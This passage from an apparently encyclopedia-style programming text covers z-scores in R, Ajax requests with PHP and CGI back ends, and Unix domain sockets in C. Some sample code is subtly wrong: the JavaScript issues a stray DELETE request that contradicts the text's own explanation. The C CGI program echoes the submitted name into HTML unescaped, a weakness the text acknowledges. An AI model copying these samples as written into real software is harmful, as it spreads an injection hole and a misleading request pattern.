message("\nCount:")
length(chestSizeVector)
message("\nMean:")
mean(chestSizeVector)
message("\nStandard deviation:")
sd(chestSizeVector)
```
Output:
```
Head:
[1] 33 33 33 34 34 34

Tail:
[1] 46 46 47 47 47 48

Count:
[1] 5732

Mean:
[1] 39.84892

Standard deviation:
[1] 2.073386
```
The third step in data science is to visualize the data set.[50] If a histogram of a data set resembles a bell shape, then the data set is approximately normally distributed.[48]
R program to display a histogram of the data set:
```r
source("frequencyDataFrameToVector.R")
dataFrame <- read.csv("chestsize.csv")
chestSizeVector <- frequencyDataFrameToVector(dataFrame, "chestsize")
hist(chestSizeVector)
```
Output: a histogram of the chest sizes, which is roughly bell-shaped.
Any variable ($x$) in a data set can be converted into a standardized variable ($z$). The standardized variable is also known as a z-score.[51] To calculate the z-score, subtract the mean and divide by the standard deviation, $z = \frac{x - \bar{x}}{s}$.[52]
R function to convert a measurement to a z-score:
```r
# Filename: zScore.R
zScore <- function(measurement, mean, standardDeviation) {
  (measurement - mean) / standardDeviation
}
```
R program to convert a chest size measurement of 38 to a z-score:
```r
source("zScore.R")
print(zScore(38, 39.84892, 2.073386))
```
Output:
```
[1] -0.8917394
```
R program to convert a chest size measurement of 42 to a z-score:
```r
source("zScore.R")
print(zScore(42, 39.84892, 2.073386))
```
Output:
```
[1] 1.037472
```
A standardized data set is a data set in which each member of an input data set was run through the zScore() function.
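R function to convert a numeric vector into a z-score vector:
```r
# Filename: zScoreVector.R
source("zScore.R")
zScoreVector <- function(vector) {
  # Compute the mean and standard deviation once, not once per element
  vectorMean <- mean(vector)
  vectorStandardDeviation <- sd(vector)
  zScoreVector <- NA
  for (i in seq_along(vector)) {
    zScoreVector[i] <- zScore(vector[i], vectorMean, vectorStandardDeviation)
  }
  return(zScoreVector)
}
```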
R program to standardize the chest size data set:
```r
source("frequencyDataFrameToVector.R")
source("zScoreVector.R")
dataFrame <- read.csv("chestsize.csv")
chestSizeVector <- frequencyDataFrameToVector(dataFrame, dataColumnName = "chestsize")
zScoreVector <- zScoreVector(chestSizeVector)
message("Head:")
head(zScoreVector)
message("\nTail:")
tail(zScoreVector)
message("\nCount:")
length(zScoreVector)
message("\nMean:")
round(mean(zScoreVector))
message("\nStandard deviation:")
sd(zScoreVector)
hist(zScoreVector)
```
Output:
```
Head:
[1] -3.303253 -3.303253 -3.303253 -2.820950 -2.820950 -2.820950

Tail:
[1] 2.966684 2.966684 3.448987 3.448987 3.448987 3.931290

Count:
[1] 5732

Mean:
[1] 0

Standard deviation:
[1] 1
```
The final line, hist(zScoreVector), also displays a histogram of the standardized data set.
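Subtraction and division are element-wise, so the loop in zScoreVector() is not needed. This sketch standardizes a short made-up vector in a single vectorized expression. It then compares the result with base R's scale(), which by default centers on the mean and divides by the standard deviation. scale() returns a one-column matrix, so as.vector() flattens it:

```r
measurements <- c(33, 38, 40, 42, 48)

# Vectorized z-scores: the mean and sd are recycled across every element.
zVectorized <- (measurements - mean(measurements)) / sd(measurements)

# scale() centers and divides by the standard deviation by default.
zScaled <- as.vector(scale(measurements))

print(round(zVectorized, 4))
print(all.equal(zVectorized, zScaled))   # TRUE
print(round(mean(zVectorized), 10))      # 0
print(sd(zVectorized))                   # 1
```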


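A histogram of a normally distributed data set that is converted to its standardized data set also resembles a bell-shaped curve. The curve is called the standard normal curve or the z-curve. The four basic properties of the z-curve are:[53]

1. The total area under the curve is 1.
2. The curve extends indefinitely in both directions, approaching the horizontal axis.
3. The curve is symmetric about 0.
4. Almost all of the area under the curve lies between -3 and 3.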
The probability that a future measurement will fall within a designated range is approximately equal to the area under the standard normal curve between the range's two z-scores, assuming the data are approximately normally distributed.[54]
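Base R's stats package, which is loaded by default, provides dnorm() for the height of the normal curve, pnorm() for the area to the left of a value, and integrate() for numerical integration. This sketch checks properties of the z-curve numerically. It also computes the area between two z-scores as the difference of two left-tail areas:

```r
# Total area under the z-curve is 1.
totalArea <- integrate(dnorm, lower = -Inf, upper = Inf)$value
print(totalArea)

# The curve is symmetric about 0.
print(isTRUE(all.equal(dnorm(-1.5), dnorm(1.5))))   # TRUE

# Almost all of the area lies between -3 and 3.
print(pnorm(3) - pnorm(-3))        # about 0.9973

# Area between two z-scores: left area of the upper minus left area of the lower.
areaBetween <- pnorm(1) - pnorm(-1)
print(areaBetween)                 # about 0.6827
```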
For example, suppose the Scottish militia's quartermaster wanted to stock up on uniforms. What is the probability that the next recruit will need a size between 38 and 42?
R program:
```r
library(tigerstats)
source("frequencyDataFrameToVector.R")
source("zScore.R")
dataFrame <- read.csv("chestsize.csv")
chestSizeVector <- frequencyDataFrameToVector(dataFrame, dataColumnName = "chestsize")
zScore38 <- zScore(38, mean(chestSizeVector), sd(chestSizeVector))
zScore42 <- zScore(42, mean(chestSizeVector), sd(chestSizeVector))
areaLeft38 <- tigerstats::pnormGC(zScore38)
areaLeft42 <- tigerstats::pnormGC(zScore42)
areaBetween <- areaLeft42 - areaLeft38
message("Probability:")
print(areaBetween)
```
Output:
```
Probability:
[1] 0.6639757
```
The pnormGC() function can compute the probability for a range without first calculating the z-scores.
R program:
```r
library(tigerstats)
source("frequencyDataFrameToVector.R")
dataFrame <- read.csv("chestsize.csv")
chestSizeVector <- frequencyDataFrameToVector(dataFrame, dataColumnName = "chestsize")
areaBetween <- tigerstats::pnormGC(c(38, 42),
                                   mean = mean(chestSizeVector),
                                   sd = sd(chestSizeVector),
                                   region = "between",
                                   graph = TRUE)
message("Probability:")
print(areaBetween)
```
Output:
```
Probability:
[1] 0.6639757
```
Because graph = TRUE, pnormGC() also draws the normal curve with the region between 38 and 42 highlighted.
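The tigerstats package is a third-party dependency. As an alternative sketch that needs only base R, note that pnorm() accepts mean and sd arguments directly. The area between 38 and 42 is then the left-tail area at 42 minus the left-tail area at 38. The chest-size table is entered inline here instead of being read from chestsize.csv:

```r
chestsize <- c(33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48)
frequency <- c(3, 19, 81, 189, 409, 753, 1062, 1082, 935, 646, 313, 168, 50, 18, 3, 1)
chestSizeVector <- rep(chestsize, times = frequency)

sizeMean <- mean(chestSizeVector)
sizeSd <- sd(chestSizeVector)

# Area under the fitted normal curve between 38 and 42.
areaBetween <- pnorm(42, mean = sizeMean, sd = sizeSd) -
  pnorm(38, mean = sizeMean, sd = sizeSd)
message("Probability:")
print(areaBetween)   # about 0.664
```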

XMLHttpRequest is a JavaScript class containing methods to asynchronously transmit HTTP requests from a web browser to a web server.[55] The methods allow a browser-based application to make a fine-grained server call and store the result in the XMLHttpRequest responseText attribute.[56] The XMLHttpRequest class is a component of Ajax programming. Without Ajax, the "Submit" button will send an entire HTML form to the server, and the server will respond by returning an entire HTML page to the browser.[56]
Generating an asynchronous request to the web server requires first instantiating (allocating the memory of) the XMLHttpRequest object. The allocated memory is assigned to a variable. The JavaScript operator that instantiates a new object is new.[57] The new operator is followed by the constructor function of the object. By convention in object-oriented languages, the constructor function has the same name as the class.[58] In this case, the class name is XMLHttpRequest. To instantiate a new XMLHttpRequest and assign it to the variable named request:[59]
```javascript
var request = new XMLHttpRequest();
```
The open method prepares the XMLHttpRequest.[60] It can accept up to five parameters, but requires only the first two.
```javascript
var request = new XMLHttpRequest();
request.open( RequestMethod, SubmitURL, AsynchronousBoolean, UserName, Password );
```
The RequestMethod may be GET for smaller quantities of data. Among the other request methods available, POST will handle substantial quantities of data.[61] DELETE is also a request method, but it asks the web server to delete the resource at SubmitURL; it does not free the XMLHttpRequest object's memory. The browser's garbage collector reclaims that memory once no variable refers to the object.
If the request method of POST is invoked, then the additional step of sending the media type Content-Type: application/x-www-form-urlencoded is required for form data.[65] The setRequestHeader method allows the program to send this or other HTTP headers to the web server. Its usage is setRequestHeader( HeaderField, HeaderValue ), and it must be called after open() and before send().[60] To enable the POST request method:
```javascript
request.setRequestHeader( "Content-Type", "application/x-www-form-urlencoded" );
```
If the request method of POST is invoked, then the web server expects the form data to be read from the standard input stream.[66] To send the form data to the web server, execute request.send( FormData ), where FormData is a text string. If the request method of GET is invoked, then the web server expects only the default headers.[67] To send the default headers, execute request.send( null ).[d]
onreadystatechange is a callback method that is executed each time the request's readyState changes during the Ajax lifecycle.[68] To set a callback method named listenMethod(), the syntax is request.onreadystatechange = listenMethod.[e] For convenience, the syntax allows an anonymous function to be defined.[68] To define an anonymous callback method:
```javascript
var request = new XMLHttpRequest();
request.onreadystatechange = function() {
  // code omitted
};
```
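The XMLHttpRequest lifecycle progresses through several stages, numbered 0 to 4. Stage 0 is before the open() method is invoked, and stage 4 is when the text string has arrived.[67] To monitor the lifecycle, XMLHttpRequest provides the readyState attribute. Stages 1 to 3 have been ambiguous, and interpretations vary across browsers.[60] The current XMLHttpRequest Standard names the stages as follows:

- 0 (UNSENT): open() has not been invoked yet.
- 1 (OPENED): open() has been invoked.
- 2 (HEADERS_RECEIVED): the response headers have been received.
- 3 (LOADING): the response body is being received.
- 4 (DONE): the operation is complete.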
When readyState reaches 4, the text string has arrived and is set in the responseText attribute.
```javascript
var request = new XMLHttpRequest();
request.onreadystatechange = function() {
  if (request.readyState == 4) {
    // request.responseText is set
  }
};
```
Upon request, the browser will execute a JavaScript function to transmit a request for the web server to execute a computer program. The computer program may be the PHP interpreter, another interpreter, or a compiled executable. In any case, the JavaScript function expects a text string to be transmitted back and stored in the responseText attribute.[67]
To create an example JavaScript function:
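cd /var/www/html
ajax_submit.js:
function ajax_submit( destination_division, submit_url, person_name )
{
    var request = new XMLHttpRequest();
    var completed_state = 4;

    // Percent-encode the name so characters such as & or # cannot break the query string.
    submit_url = submit_url + "?person_name=" + encodeURIComponent( person_name );

    request.open( "GET", submit_url, true );

    // Register the callback before send() so no state change is missed.
    request.onreadystatechange = function()
    {
        if ( request.readyState == completed_state )
        {
            document.getElementById( destination_division ).innerHTML = request.responseText;
            request.open( "DELETE", null );
        }
    };

    request.send( null );
}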
PHP is a scripting language designed specifically to interface with HTML.[69] Because the PHP engine is an interpreter, interpreting program statements as they are read, there are programming limitations[f] and performance costs.[g] Nonetheless, its simplicity allows the XMLHttpRequest set of files to be placed in the same working directory, probably /var/www/html.
The server component of a PHP XMLHttpRequest is a file located on the server that does not get transmitted to the browser. Instead, the PHP interpreter will open this file and read in its PHP instructions. The XMLHttpRequest protocol requires an instruction to output a text string.
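cd /var/www/html
ajax_server.php:
<?php
// htmlspecialchars() keeps a submitted name from being interpreted as HTML markup.
$person_name = htmlspecialchars( $_GET['person_name'] ?? '', ENT_QUOTES );
echo "<p>Hello $person_name";
?>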
The browser component of a PHP XMLHttpRequest is a file that gets transmitted to the browser. The browser will open this file and read in its HTML instructions.
cd /var/www/html
ajax_php.html:
<!doctype html>
<html>
<head>
<title>Hello World</title>
<script type=text/javascript src=ajax_submit.js></script>
</head>
<body>
<p>What is your name?
<input type=text id="person_name" size=10>
<div id=destination_division></div>
<button onclick="ajax_submit( 'destination_division', 'ajax_server.php', document.getElementById( 'person_name' ).value )">
Submit</button>
</body>
</html>
To test, browse to http://localhost/ajax_php.html, enter a name, and click Submit.
The Common Gateway Interface (CGI) process allows a browser to request the web server to execute a compiled computer program.[h]
The server component of a CGI XMLHttpRequest is an executable file located on the server. The operating system will open this file and read in its machine instructions. The XMLHttpRequest protocol requires an instruction to output a text string.
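Because ajax_submit.js inserts this text string into the page through innerHTML, a submitted name containing characters such as < or & would be interpreted as markup. A minimal sketch of escaping such a value in C before printing it; print_html_escaped is a hypothetical helper, not part of any CGI library:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: write text to out, replacing the five characters
   that are special in HTML with their character references. */
void print_html_escaped( FILE *out, const char *text )
{
    for ( ; *text != '\0'; text++ )
    {
        switch ( *text )
        {
        case '&':  fputs( "&amp;", out );  break;
        case '<':  fputs( "&lt;", out );   break;
        case '>':  fputs( "&gt;", out );   break;
        case '"':  fputs( "&quot;", out ); break;
        case '\'': fputs( "&#39;", out );  break;
        default:   fputc( *text, out );    break;
        }
    }
}
```

In a CGI program, a single printf() of the name could be split into printf( "<p>Hello " ); followed by print_html_escaped( stdout, person_name );.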
Compiled programs have two files: thesource code and a corresponding executable.
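cd /usr/lib/cgi-bin
ajax_server.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main( void )
{
    const char *prefix = "person_name=";
    const char *query_string;
    const char *person_name = "";

    query_string = getenv( "QUERY_STRING" );

    /* Skip "person_name=", but only if the query string really starts with it. */
    if ( query_string != NULL && strncmp( query_string, prefix, strlen( prefix ) ) == 0 )
        person_name = query_string + strlen( prefix );

    /* CGI requires the first line to output: */
    printf( "Content-type: text/html\n" );

    /* CGI requires the second line to output: */
    printf( "\n" );

    printf( "<p>Hello %s\n", person_name );
    return 0;
}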
cc ajax_server.c -o ajax_server
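The program above prints person_name exactly as it arrives in QUERY_STRING, so a name containing a space arrives percent-encoded (for example, Ada%20Lovelace). A minimal sketch of decoding an application/x-www-form-urlencoded value in place; url_decode and hex_value are hypothetical helper names:

```c
#include <assert.h>
#include <ctype.h>
#include <string.h>

/* Convert one hexadecimal digit (already checked with isxdigit()) to its value. */
static int hex_value( int c )
{
    if ( isdigit( c ) ) return c - '0';
    return tolower( c ) - 'a' + 10;
}

/* Hypothetical helper: decode a form-urlencoded value in place.
   "+" becomes a space and "%XX" becomes the byte 0xXX.
   A malformed escape such as a trailing "%" is copied through unchanged. */
void url_decode( char *text )
{
    char *src = text;
    char *dst = text;

    while ( *src != '\0' )
    {
        if ( *src == '+' )
        {
            *dst++ = ' ';
            src++;
        }
        else if ( src[ 0 ] == '%'
                  && isxdigit( (unsigned char) src[ 1 ] )
                  && isxdigit( (unsigned char) src[ 2 ] ) )
        {
            *dst++ = (char) ( hex_value( (unsigned char) src[ 1 ] ) * 16
                              + hex_value( (unsigned char) src[ 2 ] ) );
            src += 3;
        }
        else
        {
            *dst++ = *src++;
        }
    }
    *dst = '\0';
}
```

Because the C standard forbids modifying the string returned by getenv(), a CGI program would copy the value (for example with malloc() and strcpy()) and decode the copy.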
The CGI browser component is the same as the PHP browser component, except for a slight change in the submit_url. The syntax to tell the web server to execute an executable is /cgi-bin/ followed by the filename. For security, the web server executes only programs that reside in its designated CGI directory. In this case, the directory is /usr/lib/cgi-bin/.[i]
cd /var/www/html
ajax_cgi.html:
<!doctype html>
<html>
<head>
<title>Hello World</title>
<script type=text/javascript src=ajax_submit.js></script>
</head>
<body>
<p>What is your name?
<input type=text id="person_name" size=10>
<div id=destination_division></div>
<button onclick="ajax_submit( 'destination_division', '/cgi-bin/ajax_server', document.getElementById( 'person_name' ).value )">
Submit</button>
</body>
</html>
To test, browse to http://localhost/ajax_cgi.html, enter a name, and click Submit.
In client-server computing, a Unix domain socket is a Berkeley socket that allows data to be exchanged between two processes executing on the same Unix or Unix-like host computer.[71] This is similar to an Internet domain socket, which allows data to be exchanged between two processes executing on different host computers.
Regardless of the range of communication (same host or different host),[72] Unix computer programs that perform socket communication are similar. The only range-of-communication difference is the method to convert a name to the address parameter needed to bind the socket's connection. For a Unix domain socket, the name is a /path/filename. For an Internet domain socket, the name is an IP address:Port number. In either case, the name is called an address.[73]
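The one difference noted above, converting a name into an address structure, can be sketched side by side in C. This is a minimal sketch that assumes IPv4 for the Internet domain case; make_unix_address and make_inet_address are hypothetical helper names, while inet_pton() and htons() are standard POSIX calls:

```c
#define _POSIX_C_SOURCE 200809L
#include <arpa/inet.h>
#include <assert.h>
#include <netinet/in.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Unix domain: the name is a /path/filename.
   Returns 0 on success, -1 if the path does not fit in sun_path. */
int make_unix_address( struct sockaddr_un *address, const char *path )
{
    memset( address, 0, sizeof *address );
    if ( strlen( path ) >= sizeof address->sun_path ) return -1;
    address->sun_family = AF_UNIX;
    strcpy( address->sun_path, path );
    return 0;
}

/* Internet domain (IPv4): the name is an IP address plus a port number.
   Returns 0 on success, -1 if ip is not a valid dotted-decimal address. */
int make_inet_address( struct sockaddr_in *address, const char *ip, uint16_t port )
{
    memset( address, 0, sizeof *address );
    address->sin_family = AF_INET;
    address->sin_port = htons( port );  /* stored in network byte order */
    if ( inet_pton( AF_INET, ip, &address->sin_addr ) != 1 ) return -1;
    return 0;
}
```

Everything after this step (bind(), listen(), accept(), connect()) is the same for both, apart from the structure passed in.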
Two processes may communicate with each other if each obtains a socket. The server process binds its socket to an address, opens a listen channel, and then continuously loops. Inside the loop, the server process is put to sleep while waiting to accept a client connection.[74] Upon accepting a client connection, the server then executes a read system call that will block until data arrives. The client connects to the server's socket via the server's address. The client process then writes a message for the server process to read. The application's algorithm may entail multiple read/write interactions. Upon completion of the algorithm, the client executes exit()[75] and the server executes close().[76]
For a Unix domain socket, the socket's address is a /path/filename identifier. The server will create /path/filename on the filesystem to act as a lock file semaphore. No I/O occurs on this file when the client and server send messages to each other.[77]
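The filesystem entry created by bind() can be observed directly with stat(). A minimal sketch, assuming a writable /tmp directory; bind_creates_socket_file is a hypothetical helper:

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <unistd.h>

/* Bind a stream Unix domain socket to path, then report whether path now
   exists on the filesystem as a socket file. Returns 1 if it does,
   0 if it does not, and -1 on error. */
int bind_creates_socket_file( const char *path )
{
    struct sockaddr_un address = { 0 };
    struct stat status;
    int socket_fd;
    int result;

    if ( strlen( path ) >= sizeof address.sun_path ) return -1;
    socket_fd = socket( AF_UNIX, SOCK_STREAM, 0 );
    if ( socket_fd == -1 ) return -1;

    remove( path );  /* a leftover file from a prior run would make bind() fail */
    address.sun_family = AF_UNIX;
    strcpy( address.sun_path, path );

    if ( bind( socket_fd, (struct sockaddr *) &address, sizeof address ) == -1 )
        result = -1;
    else if ( stat( path, &status ) == -1 )
        result = -1;
    else
        result = S_ISSOCK( status.st_mode ) ? 1 : 0;

    close( socket_fd );
    remove( path );  /* closing the socket does not delete the file */
    return result;
}
```

The final remove() reflects why the server program in this section removes a prior run's file before calling bind().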
Sockets first appeared in Berkeley Software Distribution 4.2 (1983).[78] The socket interface became a POSIX standard in 2000.[78] The application programming interface has been ported to virtually every Unix implementation and most other operating systems.[78]
Both the server and the client must instantiate a socket object by executing the socket() system call. Its usage is:[79]
int socket( int domain, int type, int protocol );
The domain parameter should be one of the following common ranges of communication:[80]
AF_UNIX[j] (processes on the same host)
AF_INET (IPv4)
AF_INET6 (IPv6)
The Unix domain socket label is used when the domain parameter's value is AF_UNIX. The Internet domain socket label is used when the domain parameter's value is either AF_INET or AF_INET6.[82]
The type parameter should be one of the following common socket types:[80]
SOCK_STREAM will create a stream socket. A stream socket provides a reliable, bidirectional, and connection-oriented communication channel between two processes. For Internet domain sockets, data is carried using the Transmission Control Protocol (TCP).[80]
SOCK_DGRAM will create a datagram socket.[k] A datagram socket is connectionless and preserves message boundaries. For Internet domain sockets, data is carried using the User Datagram Protocol (UDP).[84]
SOCK_SEQPACKET will create a sequenced-packet socket. Similar to a stream socket, it is connection-oriented, but message boundaries are preserved, just like datagram sockets.[81] For Internet domain sockets, the Stream Control Transmission Protocol is used.[85]
SOCK_RAW will create a raw Internet Protocol (IP) datagram socket. A raw socket bypasses the transport layer and allows applications to interface directly with the network layer.[86] This option is only available for Internet domain sockets.[81]
The protocol parameter should be set to zero,[72] except for raw sockets, where the protocol parameter should be set to IPPROTO_RAW.[79]
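The difference in message boundaries between stream and datagram sockets can be observed with socketpair(), which returns two already-connected Unix domain sockets. A minimal sketch; the helper first_read_size is hypothetical:

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <sys/socket.h>
#include <unistd.h>

/* Send two 2-byte messages, "ab" then "cd", through a connected pair of
   Unix domain sockets of the given type, then perform one read() with a
   larger buffer. Returns the number of bytes that first read() received,
   or -1 on error. */
ssize_t first_read_size( int type )
{
    int pair[ 2 ];
    char buffer[ 16 ];
    ssize_t read_count = -1;

    if ( socketpair( AF_UNIX, type, 0, pair ) == -1 ) return -1;

    if ( write( pair[ 0 ], "ab", 2 ) == 2 && write( pair[ 0 ], "cd", 2 ) == 2 )
        read_count = read( pair[ 1 ], buffer, sizeof buffer );

    close( pair[ 0 ] );
    close( pair[ 1 ] );
    return read_count;
}
```

With SOCK_DGRAM, the first read() returns only the first 2-byte message. With SOCK_STREAM, the same read() may return both messages as one 4-byte run, because a stream carries bytes rather than messages.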
int socket_fd = socket( domain, type, protocol );
Like the regular-file open() system call, the socket() system call returns a file descriptor, or -1 on error.[72][l] The return value's suffix _fd stands for file descriptor.
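Because the return value is an ordinary file descriptor, descriptor calls such as fstat() and close() accept it just as they accept one returned by open(). A minimal sketch; socket_returns_descriptor is a hypothetical helper:

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a socket with the given domain and type (protocol 0), check
   through fstat() that the returned file descriptor refers to a socket,
   and close it. Returns 1 if so, 0 otherwise, and -1 if socket() fails. */
int socket_returns_descriptor( int domain, int type )
{
    struct stat status;
    int socket_fd = socket( domain, type, 0 );
    int result;

    if ( socket_fd == -1 ) return -1;
    result = ( fstat( socket_fd, &status ) == 0 && S_ISSOCK( status.st_mode ) ) ? 1 : 0;
    close( socket_fd );
    return result;
}
```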
After instantiating a new socket, the server binds the socket to an address. For a Unix domain socket, the address is a /path/filename.
Because the socket address may be either a /path/filename or an IP_address:Port_number, the socket application programming interface requires the address to first be set into a structure. For a Unix domain socket, the structure is:[87]
struct sockaddr_un
{
    sa_family_t sun_family;  /* AF_UNIX */
    char sun_path[ 92 ];     /* Size varies by implementation; Linux uses 108. */
};
The _un suffix stands for unix. For an Internet domain socket, the suffix will be either _in or _in6. The sun_ prefix stands for socket unix.[87]
Computer program to create and bind a stream Unix domain socket:[77]
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <assert.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/un.h>

/* Should be 91 characters or less. Some Unix-like systems allow slightly more. */
/* Use /tmp directory for demonstration only. */
char *socket_address = "/tmp/mysocket.sock";

int main( void )
{
    int server_socket_fd;
    struct sockaddr_un sockaddr_un = { 0 };
    int return_value;

    /* assert() is used for brevity; it is disabled when NDEBUG is defined. */
    server_socket_fd = socket( AF_UNIX, SOCK_STREAM, 0 );
    if ( server_socket_fd == -1 ) assert( 0 );

    /* Remove (maybe) a prior run. */
    remove( socket_address );

    /* Construct the bind address structure. */
    sockaddr_un.sun_family = AF_UNIX;
    strcpy( sockaddr_un.sun_path, socket_address );

    return_value =
        bind(
            server_socket_fd,
            (struct sockaddr *) &sockaddr_un,
            sizeof( struct sockaddr_un ) );

    /* If socket_address exists on the filesystem, then bind will fail. */
    if ( return_value == -1 ) assert( 0 );

    /* Listen and accept code omitted. */
    return 0;
}
The second parameter for bind() is a pointer to struct sockaddr. However, the parameter passed to the function is the address of a struct sockaddr_un. struct sockaddr is a generic structure that is not used. It is defined in the formal parameter declaration for bind(). Because each range of communication has its own actual parameter, this generic structure was created as a cast placeholder.[88]
After binding to an address, the server opens a listen channel to a port by executing listen(). Its usage is:[89]
int listen( int server_socket_fd, int backlog );
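The cast placeholder works because a function receiving the generic pointer can read its family field, which common implementations place at the same offset in every address structure, to learn which concrete structure the caller actually passed. A minimal sketch; family_name is a hypothetical function that only imitates this first step of bind():

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Accept the generic struct sockaddr pointer, as bind() does, and inspect
   the common family field to identify the concrete structure. */
const char *family_name( const struct sockaddr *address )
{
    switch ( address->sa_family )
    {
    case AF_UNIX:  return "AF_UNIX";
    case AF_INET:  return "AF_INET";
    case AF_INET6: return "AF_INET6";
    default:       return "unknown";
    }
}
```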
Snippet to listen:
if ( listen( server_socket_fd, 4096 ) == -1 ) assert( 0 );
For a Unix domain socket, listen() most likely will succeed and return 0. For an Internet domain socket, if the port is in use, listen() returns -1.[89]
The backlog parameter sets the queue size for pending connections.[90] The server may be busy when a client executes a connect() request. Connection requests up to this limit will succeed. If the backlog value passed in exceeds the default maximum, then the maximum value is used.[89]
After opening a listen channel, the server enters an infinite loop. Inside the loop is a system call to accept(), which puts the server process to sleep.[74] The accept() system call will return a file descriptor when a client process executes connect().[91]
Snippet to accept a connection:
int accept_socket_fd;

while ( 1 )
{
    accept_socket_fd = accept( server_socket_fd, NULL, NULL );
    if ( accept_socket_fd == -1 ) assert( 0 );

    if ( accept_socket_fd > 0 )
    {
        /* client is connected */
    }
}
When accept() returns a positive integer, the server engages in an algorithmic dialog with the client.
Stream socket input/output may execute the regular-file system calls of read() and write().[76] However, more control is available if a stream socket executes the socket-specific system calls of send() and recv(). Alternatively, datagram socket input/output should execute the socket-specific system calls of sendto() and recvfrom().[92]
For a basic stream socket, the server receives data with read( accept_socket_fd ) and sends data with write( accept_socket_fd ).
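As one example of the extra control recv() offers over read(), its MSG_PEEK flag returns queued data without removing it from the socket. A minimal sketch using socketpair(); peek_then_read is a hypothetical helper:

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Send "hola" into one end of a connected stream socket pair. On the other
   end, peek at the data with MSG_PEEK, then consume it with a plain recv().
   Returns 1 if both calls saw "hola", 0 otherwise. */
int peek_then_read( void )
{
    int pair[ 2 ];
    char peeked[ 8 ] = { 0 };
    char consumed[ 8 ] = { 0 };
    int result = 0;

    if ( socketpair( AF_UNIX, SOCK_STREAM, 0, pair ) == -1 ) return 0;

    if ( send( pair[ 0 ], "hola", 4, 0 ) == 4
         && recv( pair[ 1 ], peeked, 4, MSG_PEEK ) == 4   /* data stays queued */
         && recv( pair[ 1 ], consumed, 4, 0 ) == 4 )      /* data is removed */
        result = strcmp( peeked, "hola" ) == 0 && strcmp( consumed, "hola" ) == 0;

    close( pair[ 0 ] );
    close( pair[ 1 ] );
    return result;
}
```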
Snippet to illustrate I/O on a basic stream socket:
#include <strings.h>  /* declares strcasecmp() */

#define BUFFER_SIZE 1024

void server_algorithmic_dialog( int accept_socket_fd );

int accept_socket_fd;

while ( 1 )
{
    accept_socket_fd = accept( server_socket_fd, NULL, NULL );
    if ( accept_socket_fd == -1 ) assert( 0 );

    if ( accept_socket_fd > 0 )
    {
        server_algorithmic_dialog( accept_socket_fd );
    }
}

void server_algorithmic_dialog( int accept_socket_fd )
{
    char input_buffer[ BUFFER_SIZE ];
    char output_buffer[ BUFFER_SIZE ];
    ssize_t read_count;

    /* Leave room for a terminating null byte. */
    read_count = read( accept_socket_fd, input_buffer, BUFFER_SIZE - 1 );
    if ( read_count < 1 ) return;
    input_buffer[ read_count ] = '\0';

    if ( strcasecmp( input_buffer, "hola" ) == 0 )
        strcpy( output_buffer, "Hola Mundo" );
    else if ( strcasecmp( input_buffer, "ciao" ) == 0 )
        strcpy( output_buffer, "Ciao Mondo" );
    else
        strcpy( output_buffer, "Hello World" );

    write( accept_socket_fd, output_buffer, strlen( output_buffer ) + 1 );
}
The algorithmic dialog ends when either the algorithm concludes or read( accept_socket_fd ) returns < 1.[76] To close the connection, execute the close() system call:[76]
Snippet to close a connection:
int accept_socket_fd;

while ( 1 )
{
    accept_socket_fd = accept( server_socket_fd, NULL, NULL );
    if ( accept_socket_fd == -1 ) assert( 0 );

    if ( accept_socket_fd > 0 )
    {
        server_algorithmic_dialog( accept_socket_fd );
        close( accept_socket_fd );
    }
}
Snippet to illustrate the end of a dialog:
#define BUFFER_SIZE 1024

void server_algorithmic_dialog( int accept_socket_fd )
{
    char buffer[ BUFFER_SIZE ];
    int read_count;

    /* Omit algorithmic dialog */

    read_count = read( accept_socket_fd, buffer, BUFFER_SIZE );

    if ( read_count < 1 ) return;

    /* Omit algorithmic dialog */
}
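The < 1 test covers two cases: -1 for an error, and 0 for end of file, which a stream socket reports once the peer has closed its end and no data remains. A minimal sketch using socketpair() to stand in for the client and server; read_after_peer_close is a hypothetical helper:

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <sys/socket.h>
#include <unistd.h>

/* Connect two stream sockets with socketpair(), close the "client" end,
   and return what read() then reports on the "server" end. */
ssize_t read_after_peer_close( void )
{
    int pair[ 2 ];
    char buffer[ 16 ];
    ssize_t read_count;

    if ( socketpair( AF_UNIX, SOCK_STREAM, 0, pair ) == -1 ) return -1;

    close( pair[ 0 ] );  /* the client closes its socket or terminates */
    read_count = read( pair[ 1 ], buffer, sizeof buffer );  /* end of file */
    close( pair[ 1 ] );
    return read_count;
}
```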
Computer program for the client to instantiate and connect a socket:[75]
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <assert.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/un.h>

/* Must match the server's socket_address. */
char *socket_address = "/tmp/mysocket.sock";

int main( void )
{
    int client_socket_fd;
    struct sockaddr_un sockaddr_un = { 0 };
    int return_value;

    client_socket_fd = socket( AF_UNIX, SOCK_STREAM, 0 );
    if ( client_socket_fd == -1 ) assert( 0 );

    /* Construct the client address structure. */
    sockaddr_un.sun_family = AF_UNIX;
    strcpy( sockaddr_un.sun_path, socket_address );

    return_value =
        connect(
            client_socket_fd,
            (struct sockaddr *) &sockaddr_un,
            sizeof( struct sockaddr_un ) );

    /* If socket_address doesn't exist on the filesystem, */
    /* or if the server's connection-request queue is full, */
    /* then connect() will fail. */
    if ( return_value == -1 ) assert( 0 );

    /* close( client_socket_fd ); <-- optional */

    exit( EXIT_SUCCESS );
}
If connect() returns zero, the client can engage in an algorithmic dialog with the server. The client may send stream data via write( client_socket_fd ) and may receive stream data via read( client_socket_fd ).
Snippet to illustrate client I/O on a stream socket:
